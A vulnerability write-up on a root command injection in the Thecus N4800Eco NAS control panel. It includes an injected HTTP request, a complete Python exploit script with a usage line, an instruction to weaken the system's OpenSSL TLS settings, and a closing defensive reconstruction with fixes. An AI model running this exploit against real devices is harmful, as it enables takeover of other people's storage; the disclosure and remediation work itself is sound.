# Thecus N4800Eco NAS Server Control Panel Command Injection

I discovered a command injection vulnerability in the Thecus N4800Eco NAS Server control panel during a penetration test. I could not analyze the source code because I did not have enough time, so I will describe only how the vulnerability was detected.

### Description

First, I tried to add a user through *Local User Configuration*, but the server did not accept special characters such as `$)(`. However, users and groups can also be created with the *Batch Input* option under the *User and Group Authentication* section. I set the Batch Content to `$(ifconfig),22222,9999`, which corresponds to username, password and group name.

{% code title="Request:" %}

```
POST /adm/setmain.php?fun=setbatch HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: https://target
Connection: close
Referer: https://target/adm/index.php
Cookie: select_md=0; MYSESSID=*

batch_content=%24(ifconfig)%2C22222%2C9999
```

{% endcode %}

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-Mai69dOirBetXp-Y_fu%2F-Mai6ExqB7i_tEhJSUb6%2F1-1.PNG?alt=media\&token=2a504bc4-0c3e-4352-a8f0-bc69741654b0)

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-Mai69dOirBetXp-Y_fu%2F-Mai6cPXl4ApU36QUf3W%2F2-2.PNG?alt=media\&token=5ee3753e-0d0e-4e7d-84fc-3b679616d24b)

So the filter can be bypassed by using the *Batch Content* option to add the malicious payload as a username. After the user was added, I sent a second request to delete the `$(ifconfig)` user, and the response *Local User remove succeeds* was returned. However, the user was not actually deleted, which I found very interesting. I tried to understand what had happened and noticed that there is a *system log* section.

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiDqIRgJs4ZH9bbyen%2F-MaiFTbORc7O-jDgi_PM%2F3-1.PNG?alt=media\&token=2f3e57f1-e825-452a-80d3-9d3cf8d2a852)

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiDqIRgJs4ZH9bbyen%2F-MaiGvM6NURXxuYReF2W%2F4-1.png?alt=media\&token=222139eb-b074-45b6-9b58-f9bcf8cca54c)

Surprisingly, I saw that the `ifconfig` command had been executed.

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiKlhFI5r2BBauo8Go%2F-MaiLoSVnY0LBioSVVJC%2F8-1.PNG?alt=media\&token=e45ac954-9dcd-4c87-a071-785113cc43ee)

To verify the command injection, I tried another command, `id`:

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiMIoYzcA_EJNt2Fnn%2F-MaiNAKfe6a8EUpfgRX6%2F8-2.PNG?alt=media\&token=4afb5c26-b002-4b35-995b-2984875991d2)

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiT-6iAD4WGkIDmhHI%2F-MaiUecBtiNYXyX05abI%2F8-3.PNG?alt=media\&token=06b0c494-0bc4-4ec6-b7d3-f124f7daaea3)

So there is a command injection vulnerability that allows executing commands with `root` privileges. The `username` parameter appears to be the vulnerable one. It is time to write a basic Python script.

```python
import requests
import sys
import urllib3


# The NAS web interface only speaks legacy TLS, which recent OpenSSL builds
# refuse by default. If the script fails with an SSL handshake error:
# 1- Open the /etc/ssl/openssl.cnf file.
# 2- At the bottom of the file you will find:
#    [system_default_sect]
#    MinProtocol = TLSv1.2
#    CipherString = DEFAULT@SECLEVEL=2
# 3- Set the value of MinProtocol to TLSv1.0.

# The device uses a self-signed certificate, so every request is sent with
# verify=False; silence the resulting warnings once, at import time.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def readResult(s, target):
    # The command output is written to the "sys" category of the system log,
    # so query the newest entry and print it.
    d = {
        "fun": "setlog",
        "action": "query",
        "params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'
    }
    url = "https://" + target + "/adm/setmain.php"
    resultReq = s.post(url, data=d, verify=False)
    words = resultReq.text.split()
    print("[+] Reading system log...\n")
    # The log entry is split on whitespace; adjust the slice to the
    # output range of your command.
    print(words[5:8])


def delUser(s, target, command):
    # Deleting the user is what triggers the injection: the username reaches
    # a shell unquoted, so $(command) is expanded on the device.
    d = {
        "action": "delete",
        "username": "$(" + command + ")"
    }
    url = "https://" + target + "/adm/setmain.php?fun=setlocaluser"
    delUserReq = s.post(url, data=d, allow_redirects=False, verify=False)

    if 'Local User remove succeeds' in delUserReq.text:
        print('[+] %s command was executed successfully' % command)
    else:
        print('[-] %s command was not executed!' % command)
        sys.exit(1)
    readResult(s, target)


def addUser(s, target, command):
    # Batch Input does not apply the special-character filter of the Local
    # User form, so the payload can be smuggled in as a username.
    # Fields: username,password,group. requests form-encodes the value, which
    # yields the same body as the captured request
    # (batch_content=%24(...)%2C22222%2C9999).
    d = {'batch_content': '$(' + command + '),22222,9999'}
    url = "https://" + target + "/adm/setmain.php?fun=setbatch"
    addUserReq = s.post(url, data=d, allow_redirects=False, verify=False)

    if 'Users and groups were created successfully.' in addUserReq.text:
        print('[+] Users and groups were created successfully')
    else:
        print('[-] Users and groups were not created')
        sys.exit(1)
    delUser(s, target, command)


def login(target, username, password, command=None):
    # Authenticate to the control panel; the session cookie (MYSESSID) is
    # kept in the requests.Session and reused for the following requests.
    s = requests.Session()
    d = {
        "eplang": "english",
        "p_pass": password,
        "p_user": username,
        "username": username,
        "pwd": password,
        "action": "login",
        "option": "com_extplorer"
    }
    url = "https://" + target + "/adm/login.php"
    loginReq = s.post(url, data=d, allow_redirects=False, verify=False)

    if '"success":true' in loginReq.text:
        print('[+] Authentication successful')
    elif '"success":false' in loginReq.text:
        print('[-] Authentication failed!')
        sys.exit(1)
    else:
        print('[-] Something went wrong!')
        sys.exit(1)
    addUser(s, target, command)


def main(args):
    if len(args) != 5:
        print("usage: %s targetIp:port username password command" % args[0])
        print("example: %s 192.168.1.13:443 admin admin id" % args[0])
        sys.exit(1)
    login(target=args[1], username=args[2], password=args[3], command=args[4])


if __name__ == "__main__":
    main(args=sys.argv)
```
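The source was not analyzed, so the exact sink is unknown. The observed behaviour, though (deleting a user named `$(ifconfig)` runs `ifconfig`, and the Batch Input path skips the special-character filter that the Local User form applies), is what you get when a username is interpolated into a shell command line and input is validated per entry point instead of at the sink. The following is an added example, not the page's or Thecus' code: it reconstructs that pattern in Python with `echo` standing in for the real user-management command (an assumption, chosen so the demo is harmless), and shows the two fixes a reviewer would ask for: apply one allow-list rule to every field of the batch line, and invoke the command without a shell.

```python
import re
import shlex
import subprocess

# Hypothetical reconstruction: the real device command is unknown, so "echo"
# stands in for it. What matters is how the username reaches the process.

# One allow-list for usernames and group names, applied everywhere.
# (Portable POSIX username rule; an assumption, not Thecus' rule.)
PORTABLE_NAME = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def delete_user_vulnerable(username):
    """Username concatenated into a shell string: $(...) is expanded."""
    cmd = "echo deleting " + username  # no quoting, shell=True
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout.strip()


def delete_user_quoted(username):
    """shlex.quote stops substitution for this sink, but still goes
    through a shell, so it only holds while every caller remembers it."""
    cmd = "echo deleting " + shlex.quote(username)
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout.strip()


def delete_user_safe(username):
    """Validate, then pass the username as one argv element: no shell
    ever parses it, so $(...), ;, | and backticks are just characters."""
    if not PORTABLE_NAME.match(username):
        raise ValueError("invalid username: %r" % username)
    out = subprocess.run(["echo", "deleting", username],
                         capture_output=True, text=True)
    return out.stdout.strip()


def parse_batch_line(line):
    """Parse one Batch Input line (username,password,group) and apply the
    same name rule as the single-user form, so batch is not a bypass."""
    fields = line.split(",")
    if len(fields) != 3:
        raise ValueError("expected username,password,group")
    username, password, group = (f.strip() for f in fields)
    for name in (username, group):
        if not PORTABLE_NAME.match(name):
            raise ValueError("invalid name: %r" % name)
    return {"username": username, "password": password, "group": group}


def batch_line_is_accepted(line):
    """True if the line would be accepted by the hardened batch parser."""
    try:
        parse_batch_line(line)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed inputs: the page's payload shape and a benign line.
    payload = "$(echo injected)"
    print("vulnerable:", delete_user_vulnerable(payload))   # "deleting injected"
    print("quoted:    ", delete_user_quoted(payload))       # literal $(...)
    print("batch '%s' accepted: %s" % ("$(ifconfig),22222,9999",
          batch_line_is_accepted("$(ifconfig),22222,9999")))
    print("batch 'alice,22222,staff' accepted:",
          batch_line_is_accepted("alice,22222,staff"))
    print("safe:      ", delete_user_safe("alice"))
```

Run it and the vulnerable variant prints `deleting injected`, showing the substitution happening inside `sh -c`, while the quoted and argv variants print the payload literally. The fix worth shipping is `delete_user_safe` together with `parse_batch_line`: filtering only the Local User form is exactly the gap the page found, because the Batch Input handler feeds the same sink.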

{% embed url="https://www.youtube.com/watch?v=jf_eVWd3A0E" %}

Author: Metin Yunus Kandemir
